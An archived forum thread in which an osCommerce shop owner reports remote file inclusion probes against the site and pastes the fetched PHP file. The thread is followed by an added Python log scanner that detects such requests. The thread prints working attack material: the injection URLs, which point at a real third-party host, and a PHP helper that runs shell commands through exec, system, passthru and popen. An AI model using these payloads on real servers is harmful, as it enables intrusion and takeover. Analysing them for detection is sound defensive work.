multimixer Posted July 2, 2009

I found a "customer" being at this place of my site

/catalog/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt?

From cpanel I see that he was also here

/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/ec.txt?

The content of this ec.txt file is:

```php
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
  $res = '';
  if (!empty($cfe)){
    if(function_exists('exec')){
      @exec($cfe,$res);
      $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
      $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
    elseif(function_exists('passthru')){
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    }
  }
  return $res;
}
exit;
```

That's not good for sure. But what does it mean exactly? What happened to me now? What am I supposed to do?

My community profile | Template system for osCommerce - New: Responsive | Feedback channel

Nullachtfuffzehn Posted July 2, 2009

It was an intrusion attempt by PHP injection to take over your webserver. An intrusion detection system could enhance the security of your website. As far as I know there is an add-on that provides basic protection against such attempts.

This topic is now archived and is closed to further replies.
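
The requests in the first post try to set `_SERVER[DOCUMENT_ROOT]` from the query string and point it at a remote file. As an added example (not part of the original thread and not the add-on mentioned in the reply), this Python sketch scans access-log lines for that pattern, including its percent-encoded form; the log lines, the `attacker.example` host and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP superglobal names that a request parameter must never be allowed to set.
SUPERGLOBALS = {"_SERVER", "_GET", "_POST", "_COOKIE", "_FILES",
                "_ENV", "_REQUEST", "_SESSION", "GLOBALS"}
# Values that point an include path at a remote or wrapper resource.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?|php)://", re.I)
# Request line inside a common/combined format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jul/2009:10:15:01 +0000] "GET /catalog/'
    '?_SERVER[DOCUMENT_ROOT]=http://attacker.example/ec.txt? HTTP/1.1" 200 5120',
    '203.0.113.7 - - [02/Jul/2009:10:15:03 +0000] "GET /?%5FSERVER%5BDOCUMENT'
    '_ROOT%5D=http%3A%2F%2Fattacker.example%2Fec.txt HTTP/1.1" 200 4801',
    '198.51.100.20 - - [02/Jul/2009:10:16:40 +0000] "GET /catalog/'
    'product_info.php?products_id=12 HTTP/1.1" 200 9031',
]


def classify(target):
    """Return (parameter, reason) findings for one request target."""
    findings = []
    query = target.partition("?")[2]
    # parse_qsl percent-decodes names and values, so encoded probes match too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.split("[", 1)[0] in SUPERGLOBALS:
            reason = "superglobal override"
            if REMOTE_SCHEME.match(value):
                reason += " with remote URL"
            findings.append((name, reason))
    return findings


def scan(lines):
    """Return (client_ip, target, findings) for every suspicious log line."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((line.split(" ", 1)[0], match.group(1), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, findings)
```

A hit in the log only shows that the request was made; whether the remote file was actually included depends on the PHP configuration and the application code of the site.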